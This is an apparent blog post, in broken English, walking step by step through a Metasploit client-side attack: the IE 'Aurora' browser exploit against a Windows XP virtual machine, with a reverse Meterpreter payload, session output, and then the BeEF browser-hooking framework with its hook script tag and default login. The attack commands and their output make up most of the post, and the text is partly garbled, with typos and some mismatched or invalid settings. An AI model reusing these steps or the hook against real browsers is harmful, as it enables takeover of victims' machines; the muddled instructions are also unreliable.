Jumat, 28 Agustus 2015

EXSPLOIT CLIEN ATTACK SITE AT COMBINE WITH BEEF

==>>Open windows in VirtualBox
 
==>> further into the terminal. we will be to exsploit brouser in windows xp it then typing the command terminal

┌─[✗]─[root@parrot]─[/home/budhya]
└──╼ #msfconsole
                                                
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.3-2015062101 [core:4.11.3.pre.2015062101 api:1.0.0]]
+ -- --=[ 1463 exploits - 838 auxiliary - 229 post        ]
+ -- --=[ 428 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]


==>>then the next we enter the command start by typing commands exsploit ago exsploit ago
msf  >show option
 msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ms10_002_aurora) > Interrupt: use the 'exit' command to quit


==>>The next after that typing back

 msf exploit(ms10_002_aurora) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf exploit(ms10_002_aurora) > show options



==>>The next after that typing back

msf exploit(ms10_002_aurora) > set URIPATH (nama file yg akan di krin).mp3
URIPATH => contoh  smangewe.mp3
see the pictures in the block



==>>then further re-typing the command

 msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_rcp_dns
[-] The value specified for PAYLOAD is not valid.
msf exploit(ms10_002_aurora) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms10_002_aurora) > LPORT 53
[-] Unknown command: LPORT.
msf exploit(ms10_002_aurora) > set LPORT 53
LPORT => 53
msf exploit(ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.56.1     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  smangewe.mp3     no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic



==>> The next step typing back

msf exploit (ms10_002_aurora)> exploit

==>> then enter it will appear



[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.100:53
[*] Using URL: http://192.168.56.1:8080/smangewe.mp3
[*] Server started.
msf exploit(ms10_002_aurora) > [*] 192.168.56.101   ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.56.101   ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
Interrupt: use the 'exit' command to quit






==>> then copy the file brouser which appears at the top of that and get into the next stage of entry into windows in virtualbox and c

copy website on the internet before ExSplorer.




==>>then subsequently returned to the terminal and typing


msf exploit(ms10_002_aurora) > sessions -l

==>>then the note




Active sessions
===============

  Id  Type                   Information           Connection
  --  ----                   -----------           ----------
  1   meterpreter x86/win32  XPSP3\XP SP3 @ XPSP3  192.168.56.1:53 -> 192.168.56.101:1058 (192.168.56.101)

msf exploit(ms10_002_aurora) > Interrupt: use the 'exit' command to quit
msf exploit(ms10_002_aurora) > [*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: Died
msf exploit(ms10_002_aurora) >
[*] 192.168.56.101   ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (884270 bytes) to 192.168.56.101
[*] Meterpreter session 2 opened (192.168.56.1:53 -> 192.168.56.101:1032) at 2015-08-28 02:56:38 +0700
[*] 192.168.56.101 - Meterpreter session 2 closed.  Reason: Died
The sign EXSPLOIT WE SEND ALREADY WORKED

then automatically we will go into early tampialan further beef bka termina to enter beef BEEF typing in terminal

┌─[root@parrot]─[/home/budhya]
└──╼ #service beef-xss start












┌─[root@parrot]─[/home/budhya]
└──╼ #beef-xss -h
[*] Please wait as BeEF services are started.
[*] You might need to refresh your browser once it opens.
[*] UI URL: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

(process:18938): GLib-CRITICAL **: g_slice_set_config: assertion 'sys_page_size == 0' failed
FoxyProxy settingsDir: /root/.mozilla/firefox/a6mpn2rf.default/foxyproxy.xml
FoxyProxy settingsDir: /root/.mozilla/firefox/a6mpn2rf.default/foxyproxy.xml




















then automatically we will go into early tampialan beef

Masuka user name and password
user name : beef
password  : beef


The next entry to the original view beef

then we can use within their meef our purposes.





Tidak ada komentar:

Posting Komentar